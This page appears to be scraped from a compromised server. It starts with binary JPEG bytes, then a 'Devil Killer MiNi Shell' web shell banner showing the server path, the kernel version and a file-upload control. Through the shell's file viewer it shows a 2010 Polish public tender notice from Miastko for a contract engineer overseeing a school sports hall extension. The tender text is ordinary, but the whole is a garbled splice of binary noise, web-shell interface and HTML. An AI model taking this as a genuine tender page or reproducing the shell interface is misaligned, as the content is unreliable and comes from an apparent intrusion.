JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100430/104575-N-2010.html

<p class="kh_header"><b>Miastko: Pełnienie funkcji Inżyniera kontraktu realizacji projektu pn.: Rozbudowa Szkoły Podstawowej w Świerznie o stałą namiotową halę sportową wraz z zapleczem sanitarnym i rozbudową instalacji wewnętrznej,  gm. Miastko, pow. bytowski, woj.  pomorskie.</b><br>
<b>Numer ogłoszenia: 104575 - 2010; data zamieszczenia: 30.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miastko , ul. Grunwaldzka 1, 77-200 Miastko, woj. pomorskie, tel. 059 8572081, faks 059 8572368.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miastko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inżyniera kontraktu realizacji projektu pn.: Rozbudowa Szkoły Podstawowej w Świerznie o stałą namiotową halę sportową wraz z zapleczem sanitarnym i rozbudową instalacji wewnętrznej,  gm. Miastko, pow. bytowski, woj.  pomorskie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi polegającej na pełnieniu funkcji Inżyniera kontraktu w  zakresie zarządzania, kontrolowania, nadzorowania i rozliczania realizacji projektu pn.: Rozbudowa Szkoły Podstawowej w Świerznie o stałą namiotową halę sportową wraz z zapleczem sanitarnym i rozbudową instalacji wewnętrznej, obejmującego wykonanie następującego zakresu rzeczowego: 
1. hali sportowej o wymiarach w osiach 12,00 m x 24,00 m i wysokości 8,0 m, w skład której wchodzi: 
a. nawierzchnia (posadzka) bezspoinowa, poliuretanowa elastyczna wraz z wymalowaniem linii dla poszczególnych boisk- (wg projektu);  
b. konstrukcja nośna stalowa (łuki stalowe w rozstawie 4,0m) pokryta dwiema warstwami powłoki wykonanej z tkaniny poliestrowej pomiędzy którymi znajduje się powietrze pod ciśnieniem (wg projektu);
c. dostawa i montaż:
- tulei montażowych z deklem maskującym, zestawu do gry w piłkę ręczną (tj. bramki o wymiarach 3,0 m x 2,0 m);
- tulei montażowych z deklem maskującym, zestawu do gry w koszykówkę (tj. konstrukcja nośna jednosłupowa z wysięgnikiem regulowanym zabezpieczonym ochraniaczem przeciw zderzeniowym, tablica, obręcz z siatką);
- tulei montażowych z deklem maskującym, zestawu do gry w piłkę siatkową  i badmintona (tj. słupki do siatkówki/badmintona aluminiowe wielofunkcyjne z płytą regulującą wysokość, siatka z antenką, siedzenie dla sędziego);   
2. zaplecza sanitarno - szatniowego o konstrukcji murowanej (wg  projektu);
3. łącznika nowo budowanej hali z istniejącym budynkiem szkoły - konstrukcja murowana (wg  projektu);
4. adaptacji w istniejącym budynku szkoły korytarza łączącego istniejący budynek z nowo budowaną halą (wg projektu);
5. instalacji centralnego ogrzewania i wentylacji mechanicznej (wg projektu);
6. przyłącza i wewnętrznej instalacji elektrycznej wraz z osprzętem, instalacji odgromowej (wg projektu);
7. instalacji wodno-kanalizacyjnej wraz z osprzętem (wg projektu);
8. przyłącza wodno-kanalizacyjnego (wg projektu);
9. kanalizacji deszczowej wraz z szczelnymi zbiornikami odparowującymi (wg projektu);
10. instalacji ppoż. (wg projektu);
11. opaski wokół nowo budowanej hali, zaplecza, łącznika z kostki brukowej o gr. 6cm na podsypce cementowo - piaskowej (wg projektu);
12. drogi wjazdowej przeciwpożarowej na terenie działki poprzez modyfikację bram, ułożenia kostki brukowej gr. 8cm itp. (wg projektu);
13. zagospodarowanie terenu (wyrównanie, obsianie trawą, uporządkowanie) 
14. obsługa geodezyjna inwestycji wraz z inwentaryzacją powykonawczą geodezyjną.
Zakres rzeczowy przedmiotu zamówienia:
1. zapoznanie się z całą dokumentacją formalną-prawną jaka obowiązuje strony - odpowiednio:         Zamawiający, Inżynier kontraktu, Wykonawca robót,  od początku realizacji inwestycji do przyjęcia rozliczenia końcowego bez zastrzeżeń przez Zamawiającego. Dokumentacja formalno-prawna  składa się z :
1). dokumentacji projektowej obejmującej wykonanie robót budowlanych tj.
a) Projektu budowlano - wykonawczy architektura : Rozbudowa Szkoły Podstawowej w Świerznie o stałą namiotową halę sportową wraz z zapleczem sanitarnym, rozbudową instalacji wewnętrznej oraz projekt zagospodarowania terenu;
b) Projektu budowlano - wykonawczy konstrukcja : Rozbudowa Szkoły Podstawowej w Świerznie o stałą namiotową halę sportową wraz z zapleczem sanitarnym, rozbudową instalacji wewnętrznej oraz projekt zagospodarowania terenu;
c) Projektu budowlano - wykonawczy instalacje sanitarne : Rozbudowa Szkoły Podstawowej w Świerznie o stałą namiotową halę sportową wraz z zapleczem sanitarnym, rozbudową instalacji wewnętrznej oraz projekt zagospodarowania terenu;
d) Projektu budowlano - wykonawczy branża elektryczna : Rozbudowa Szkoły Podstawowej w Świerznie o stałą namiotową halę sportową wraz z zapleczem sanitarnym, rozbudową instalacji wewnętrznej oraz projekt zagospodarowania terenu;
e) Ekspertyza techniczna  : Rozbudowa Szkoły Podstawowej w Świerznie o stałą namiotową halę sportową wraz z zapleczem sanitarnym, rozbudową instalacji wewnętrznej oraz projekt zagospodarowania terenu;
f) Dokumentacja geotechniczna : Rozbudowa Szkoły Podstawowej w Świerznie o stałą namiotową halę sportową wraz z zapleczem sanitarnym, rozbudową instalacji wewnętrznej oraz projekt zagospodarowania terenu;
g) Specyfikacji technicznych wykonania i odbioru robót.
2). inne dokumenty, które są obowiązujące na podstawie ww. wymienionych dokumentów oraz  jakie powstaną w wyniku przeprowadzenia postępowań ws. udzielenia zamówienia wykonawcy robót budowlanych (dokumentacja przetargowa, najkorzystniejsza oferta, umowa z wykonawcą robót),
2. udział w posiedzeniu komisji przetargowej w roli doradcy w kwestiach technicznych  postępowania o  udzielenie zamówienia na roboty budowlane,
3. zgłaszanie ewentualnych uwag (wniosków) w odniesieniu do treści dokumentacji projektowych,
4. organizacja i udział w przekazaniu terenu budowy Wykonawcy - w tym sporządzenie stosownego protokołu,
5. organizowanie i prowadzenie narad koordynacyjnych - nie mniej niż jeden raz na dwa tygodnie, a w zależności od potrzeb częściej zgodnie z żądaniem Zamawiającego,
6. wykonywanie czynności inspektora nadzoru w branży budowlanej, elektrycznej i sanitarnej zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (t.j. Dz. U. z 2003r. Nr 207, poz. 2016 z  późn. zm.),
7. kontrola  zgodności realizacji robót budowlanych  z  dokumentacją projektową, specyfikacją istotnych warunków zamówienia, specyfikacjami technicznymi wykonania i odbioru robót budowlanych, treścią oferty Wykonawcy i  zawartą z nim umową,
8. koordynacja realizacji robót w celu zachowania ich postępu zgodnie z harmonogramem rzeczowo-finansowym,
9. weryfikowanie, aktualizowanie i sporządzanie  harmonogramów rzeczowo-finansowych w zależności od potrzeb,
10. zgłaszanie Zamawiającemu w razie potrzeby konieczności wykonania robót dodatkowych, zamiennych -  sporządzanie na tę okoliczność protokołów konieczności (robót zamiennych) i przedkładanie ich Zamawiającemu do akceptacji przed realizacją tych robót,
11. ewidencjonowanie kosztów inwestycji i ich rozliczanie z Zamawiającym w okresach miesięcznych,
12. przygotowanie i przedstawianie comiesięcznych sprawozdań z postępu robót i realizacji wydatków zaplanowanych nakładów finansowych na realizację zadania,
13. sporządzanie i przekazywanie Zamawiającemu niezbędnych dokumentów do uruchamiania finansowania inwestycji ,
14. sprawdzanie szczegółowych kalkulacji, kosztorysów powykonawczych, faktur wraz z załączonymi dokumentami przedstawionych przez wykonawców, dostawców i usługobiorców oraz uzgadnianie wydatków i kosztów realizowanej inwestycji,
15. spowodowanie, w razie potrzeby, naniesienia zmian w dokumentacji projektowej i przekazanie Zamawiającemu dokumentacji powykonawczej,
16. przygotowanie i dokonywanie odbiorów robót ulegających zakryciu, zanikowych, odbiorów częściowych robót oraz odbioru końcowego zgodnie z warunkami określonymi w umowie z Wykonawcą robót i w innych dokumentach kontraktu, 
17. dokonywanie w uzgodnieniu z Zamawiającym zmian wynikłych w trakcie realizacji robót,
18. sporządzanie opinii dotyczących wad przedmiotu umowy, uznanych za nie nadających się do ich usunięcia oraz wnioskowanie o obniżenie wynagrodzenia wykonawcom z określeniem i utraty wartości robót i kwot obniżonego wynagrodzenia za te roboty,
19. zawiadamianie Zamawiającego i Wykonawcę o stwierdzonych wadach w jego robotach w okresie rękojmi,
20. sporządzanie wniosków o zapłatę kar umownych za zwłokę Wykonawcy w realizacji inwestycji oraz za zwłokę w usunięciu usterek stwierdzonych przy odbiorze robót,
21. sporządzenie i dostarczenie Zamawiającemu ostatecznego rozliczenia zrealizowanej i odebranej inwestycji  w tym operatu odbiorczego wraz z protokołem OT/przyjęcia środka trwałego w terminie do 20 grudnia  2010r. tj.  w ciągu 10 dni licząc od terminu odbioru końcowego inwestycji planowanego na dzień 10 grudnia 2010r. - rozumianego jako datę podpisania przez Zamawiającego protokołu końcowego odbioru zamówienia (robót) po zrealizowaniu całego zakresu rzeczowego,
22. zgłoszenie zrealizowanej inwestycji do użytkowania , przygotowanie dokumentacji i wniosku o decyzję na użytkowanie,
23. uczestniczenie w czynnościach kontrolnych sprawowanych przez organ nadzoru budowlanego i jednostek   sprawujących funkcje kontrolne dotyczące projektu,
24. udział w pracach komisji związanych z przeglądami gwarancyjnymi,
25. udział w przeglądach pogwarancyjnych i sporządzanie protokołów pogwarancyjnych,
26. spowodowanie zastępczego usunięcia w okresie rękojmi wad i usterek na koszt Wykonawcy,

Warunki realizacji (wykonania) przedmiotu zamówienia
1. obowiązujące dokumenty kontraktowe - wymienione w poz. II.1,
2. Inżynier kontraktu zobowiązany jest pełnić swoją funkcję zgodnie z wymaganiami wynikającymi z dokumentów kontraktowych i  obowiązujących przepisów odnoszących się do przedmiotu zamówienia w zakresie realizacji robót budowlanych, stosowania materiałów i urządzeń, sprawowania nadzoru (funkcji inspektora nadzoru) w branży budowlanej, elektrycznej i  sanitarnej,  zawartych m.in. w  ustawie z dnia 7 lipca 1994 r. - Prawo budowlane (t.j. Dz. U. z 2003r. Nr207, poz. 2016 z  późn. zm.) i innych,
3. Inżynier kontraktu zobowiązany jest do obecności na terenie budowy na każde żądanie Zamawiającego w sytuacji, w której  jego nieobecność grozi Zamawiającemu poniesieniem szkody, lub innymi sankcjami związanymi z przebiegiem realizacji robót. W takim przypadku przybycie musi nastąpić w dniu  zgłoszenia takiej konieczności,
4. częstotliwość inspekcji robót musi zabezpieczać jakość ich wykonania i umożliwiać Wykonawcy postęp robót zgodnie z przyjętym harmonogramem. W przypadku prowadzenia robót w strefach podwyższonego zagrożenia obecność Inżyniera kontraktu  powinna być adekwatna do stopnia ewentualnego zagrożenia,
5. Inżynier kontraktu zobowiązany jest do reagowania na bieżąco z natychmiastowym zawiadamianiem Zamawiającego o zagrożeniach terminów realizacyjnych przyjętych w harmonogramie,
6. Wszelkie polecenia, decyzje, uwagi muszą być bezwzględnie wydawane na piśmie (wpisem w dzienniku budowy),
7. w przypadku nie wywiązywania się określonych osób z nałożonych obowiązków dotyczących sprawowania nadzoru (funkcji inspektora nadzoru), a także w przypadku złej współpracy z  Zamawiającym i Wykonawcą, Zamawiający  jest uprawniony  do żądania zmiany osoby, której to dotyczy a Inżynier kontraktu to żądanie musi spełnić; w razie odmowy spełnienia takiego żądania, Zamawiający po określonej na piśmie dacie wzywającej do zaprzestania sprawowania  nadzoru inwestorskiego ( dla danej branży) jest uprawniony do wyznaczenia takiej osoby we własnym zakresie, a wynagrodzenie brutto przysługujące tej osobie będzie potrącane z faktur wystawianych przez Inżyniera kontraktu za świadczenie jego usługi,   
8. jeżeli z  przyczyn nie nazwanych na etapie prowadzonego postępowania termin ostatecznego finansowego rozliczenia projektu ulegnie przedłużeniu to fakt ten nie zwalnia Inżyniera kontraktu z  obowiązku  ostatecznego finansowego rozliczenia projektu pod rygorem odmowy określonej części wynagrodzenia, równoważnej wysokości wynagrodzenia za zlecenie  dokonania przedmiotowego rozliczenia osobom trzecim, 
9. zagwarantowanie przedłużenia obowiązku wykonywania czynności określonych w poz. 24. do poz. 26 na okres objęty gwarancją udzieloną przez  wykonawcę  robót budowlanych, bez dodatkowego wynagrodzenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.54.10.00-2, 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Na podstawie  art. 45 ust. 2  Pzp  zamawiający żąda od wykonawców ubiegających się o udzielenie zamówienia  wniesienia wadium w  kwocie  500,00  PLN  (słownie: pięćset złotych   00/100). Wykonawca ubiegający się o udzielenie zamówienia  zobowiązany jest do wniesienia wadium przed  upływem terminu składania ofert tj. do dnia 10 maja 2010r. do godz. 1200.  Wadium  może być wnoszone w jednej lub kilku następujących formach:
1) w pieniądzu, 2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy musi być poręczeniem pieniężnym, 3) gwarancjach bankowych, 4) gwarancjach ubezpieczeniowych, 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, ze zm.). Wadium wnoszone w pieniądzu musi być wpłacone  przelewem na rachunek bankowy Zamawiającego -  PKO BP  O/Miastko,  nr  97 1020 4708 0000 7102 0004 4362. Wniesione w ten sposób wadium będzie skuteczne jeżeli w podanym terminie tj. do dnia 10 maja 2010r. do godz. 1200 znajdzie się na rachunku bankowym Zamawiającego. W przeciwnym przypadku wykonawca zostanie wykluczony z postępowania. Dlatego też należy dochować należytej staranności aby nie dopuścić do uchybienia wskazanego terminu.
Uwaga: Niedopuszczalna jest forma gotówkowej wpłaty w kasie Urzędu  Miejskiego w Miastku.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przepisy prawa nie nakładają obowiązku posiadania uprawnień (koncesji, zezwoleń, licencji) do wykonywania działalności gospodarczej w zakresie upoważniających wykonawcę do ubiegania się o udzielenie i realizację zamówienia będącego przedmiotem niniejszego postępowania;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia tego warunku wykonawcy zobowiązani są do wykazania, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali ( zakończyli) jako inżynier kontraktu (inspektor nadzoru)  nie mniej niż jedną usługę polegającą na zarządzaniu, kontrolowaniu, nadzorowaniu i rozliczaniu budowy lub przebudowy namiotowych hal sportowych, zadaszonych boisk sportowych, sal sportowych w konstrukcji tradycyjnej, o wartości nie mniej niż 300.000,00 PLN brutto (słownie: trzysta tysięcy złotych 00/100).
Ocena spełnienia wymaganego warunku zostanie przeprowadzona zgodnie z formułą spełnia/ nie spełnia w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w części 8.0. siwz i odpowiednio w ogłoszeniu, które wykonawcy zobowiązani są złożyć wraz z ofertą w celu potwierdzenia spełnienia tego warunku. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia stosownie do art. 23 ustawy Pzp ( np. na podstawie umowy konsorcjalnej) opisany warunek powinni spełniać wspólnie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunku wykonawcy zobowiązani są do wykazania dysponowania środkiem transportu , który będzie pozostawał do dyspozycji osób przewidzianych do realizacji zamówienia w ilości - 1 szt 
Ocena spełnienia wymaganego warunku zostanie przeprowadzona zgodnie z formułą spełnia/ nie spełnia w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w części 8.0. siwz i odpowiednio w ogłoszeniu, które wykonawcy zobowiązani są złożyć wraz z ofertą w celu potwierdzenia spełnienia tego warunku. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia stosownie do art. 23 ustawy Pzp ( np. na podstawie umowy konsorcjalnej) opisany warunek powinni spełniać wspólnie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunku wykonawcy zobowiązani są do wykazania dysponowania następującymi  osobami - wymagania minimalne : 1) osobą przewidzianą do zarządzania, kontrolowania, nadzorowania robót w zakresie branży budowlanej posiadającą odpowiednie dla tego zadania uprawnienia budowlane o specjalności drogowej, będącą członkiem Okręgowej Izby Inżynierów Budownictwa zgodnie z ustawą z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów, lub posiadającą stosowne uprawnienia upoważniające ją do pełnienia ww. funkcji na terenie Polski w przypadku osoby z kraju członkowskiego Unii Europejskiej -  legitymującymi się nie mniejszym niż 3 letnim stażem zawodowym; 2) osobą przewidzianą do zarządzania, kontrolowania, nadzorowania robót w zakresie branży sanitarnej- posiadającą odpowiednie uprawnienia budowlane w tym zakresie o specjalności sanitarnej, będącą członkiem Okręgowej Izby Inżynierów Budownictwa zgodnie z ustawą z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów lub posiadającą stosowne uprawnienia upoważniające ją do pełnienia ww. funkcji na terenie Polski w przypadku osoby z kraju członkowskiego Unii Europejskiej -  legitymującymi się nie mniejszym niż 3 letnim stażem zawodowym; 3) osobą przewidzianą do zarządzania, kontrolowania, nadzorowania robót w zakresie branży elektrycznej - posiadającą odpowiednie uprawnienia budowlane w tym zakresie o specjalności sanitarnej, będącą członkiem Okręgowej Izby Inżynierów Budownictwa zgodnie z ustawą z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów lub posiadającą stosowne uprawnienia upoważniające ją do pełnienia ww. funkcji na terenie Polski w przypadku osoby z kraju członkowskiego Unii Europejskiej -  legitymującymi się nie mniejszym niż 3 letnim stażem zawodowym; 4) osobą przewidzianą do obsługi finansowo-rzeczowej, sprawozdawczo-rozliczeniowej projektu legitymującą się 3 letnim stażem zawodowym w tym zakresie odnoszącym się do obsługi  inwestycji jak przedmiot zamówienia, odnosi się to również do osób z kraju członkowskiego Unii Europejskiej. Ocena spełnienia wymaganego warunku zostanie przeprowadzona zgodnie z formułą spełnia/ nie spełnia w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w części 8.0. siwz i odpowiednio w ogłoszeniu, które wykonawcy zobowiązani są złożyć wraz z ofertą w celu potwierdzenia spełnienia tego warunku. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia stosownie do art. 23 ustawy Pzp ( np. na podstawie umowy konsorcjalnej) opisany warunek powinni spełniać wspólnie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunków wykonawcy zobowiązani są do wykazania, że posiadają lub dysponują środkami finansowymi w kwocie nie mniejszej niż 10.000 zł (słownie: dziesięć tysięcy złotych). Ocena spełnienia wymaganego warunku zostanie przeprowadzona zgodnie z formułą spełnia/ nie spełnia w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w części 8.0. siwz i odpowiednio w ogłoszeniu, które wykonawcy zobowiązani są złożyć wraz z ofertą w celu potwierdzenia spełnienia tego warunku. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia stosownie do art. 23 ustawy Pzp ( np. na podstawie umowy konsorcjalnej) opisany warunek powinni spełniać wspólnie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
